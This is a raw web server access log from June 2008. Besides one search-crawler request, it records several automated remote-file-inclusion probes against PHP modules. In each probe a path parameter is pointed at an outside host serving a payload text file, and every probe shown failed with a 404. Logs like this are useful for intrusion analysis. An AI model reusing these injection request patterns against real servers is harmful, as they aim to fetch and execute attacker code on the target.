74.6.8.113 - - [24/Jun/2008:23:16:09 -0500] "GET /logs/access_log.1190764800 HTTP/1.0" 200 251420 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
200.203.122.236 - - [24/Jun/2008:23:18:29 -0500] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
200.203.122.236 - - [24/Jun/2008:23:18:33 -0500] "GET //modules/Neos_Chronos/header.php?base_folder=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
200.203.122.236 - - [24/Jun/2008:23:19:28 -0500] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://thepornhandbook.com/templates/id.txt%20??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
200.203.122.236 - - [24/Jun/2008:23:19:33 -0500] "GET //modules/Neos_Chronos/header.php?base_folder=http://thepornhandbook.com/templates/id.txt%20??? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
195.34.78.106 - - [24/Jun/2008:23:21:16 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
195.34.78.106 - - [24/Jun/2008:23:21:16 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
61.70.204.99 - - [24/Jun/2008:23:23:28 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
